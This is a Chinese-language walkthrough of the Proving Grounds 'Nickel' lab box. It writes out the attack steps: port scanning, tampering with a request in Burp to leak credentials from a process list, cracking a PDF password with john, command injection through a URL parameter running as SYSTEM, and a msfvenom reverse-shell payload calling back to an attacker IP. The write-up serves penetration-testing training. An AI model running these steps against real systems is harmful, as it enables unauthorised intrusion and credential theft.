Proving Grounds Practice : Nickel Walkthrough
Proving Grounds Practice : Nickel Walkthrough
Foothole (立足點 ) :
- 網頁 80 有個按鈕 "List Running Processes" 送出後跑 168.254~~ APIPA IP
- 修改 IP 為靶機 IP,並改成 POST 後與加上 Content-Type、Content-Length 後成功抓到 Process
- Process 中出現帳號與密碼 Hash,破解 Hash 後用驗證的帳號密碼 SSH 登入成功
PE ( 提權 ) :
- 看到一個 PDF 檔案,john 破解加密密碼後得知 "Temporary Command endpoint"
- 網頁測試可以直接輸入 command,執行 payload 後獲得管理者 Shell
注意事項 :
- 此靶機偏向 Web-200 的課程與 PEN-200 比較不相關,但可了解與學習 Web 相關應用
第一步 Rustscan
snmp closed
nmap,└─$ sudo nmap -sCV -A -p 21,22,80,135,139,445,3389,5040,7680,8089,33333,49664,49665,49666,49667,49668,49669 192.168.244.99 | tee nmap
21 FTP
22 SSH
80 HTTP
3389 Hostname:NICKEL
8089 HTTP
33333 HTTP
enum4linux
smbclient list check
ftp 匿名登入失敗
ftp ftp:ftp 登入失敗
whatweb
80 /
80 /robots.txt
8089 /
8089 /robots.txt
點了第一個 "List Current Deployments" 跳轉到 APIPA IP 169.254.129.94 33333 Port 某個網頁
第二個、第三個按鈕也都沒反應,因為都轉到 169.254.129.94
手動直接在網址改 IP 一樣沒東西
33333 /
33333 /robots.txt
用 Burp Suite 修正 GET 送出的 Host IP
將 169.254.129.94 改成靶機的 IP,一樣沒有任何結果
將 GET 改成 POST 送出看看
注意這裡用到 POST 所以要加上 "Content-Type: application/x-www-form-urlencoded"
出現要求 content length 的訊息,預設沒有這個值
這一次再加上 "Content-Length: 0" 送出看看
出現 Process 了
發現了一組帳號密碼,密碼看起來像是 HASH
--user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK"
hashes.com 破解看看得到密碼 "NowiseSloopTheory139"
現在擁有一組帳號密碼 ariah:NowiseSloopTheory139
crackmapexec 試試看,└─$ crackmapexec smb 192.168.244.99 -u 'ariah' -p 'NowiseSloopTheory139'
看來是一組有用的驗證
evil-winrm 連線測試失敗
hydra SSH 測試看看,看來可以登入,那就直接登入看看
進去了,拿到初步登入點
開始 PE,whoami /priv
在 C:\ 目錄底下發現一個有趣的檔案 output.txt
看了一下內容如下,主要是這一段 Host Application: C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -WindowStyle Hidden -NoProfile -Command C:\freezeScript\
win10.ps1
但查了一下沒有 C:\freezeScript 這個路徑
C:\ftp 的路徑跟 FTP 登入時的 Root Path 是一樣的,裡面是一個 PDF 檔案
開啟 PDF 需要密碼,這看來就很有梗
破解看看,└─$ pdf2john Infrastructure.pdf > pdf.hash
└─$ john pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
獲得一組密碼 : ariah4168
開啟 PDF 檔,看來要寫死 hosts file 再去存取一次 Web 試試看
加了 Hosts 再存取看看,沒啥不一樣的地方
不過 PDF 寫 [ Temporary Command endpoint ],讓我們想要測試 command 看看
結果在一輪測試後發現使用 ? 加上 command 可以成功執行
http://nickel/?whoami,而且還是 nt authority\system
建立 payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.224 LPORT=4444 -f exe -b '\x00\x0d\x0a' -o shell.exe
上傳 payload
URL encode,cmd.exe /c c:\users\ariah\desktop\shell.exe
留言
張貼留言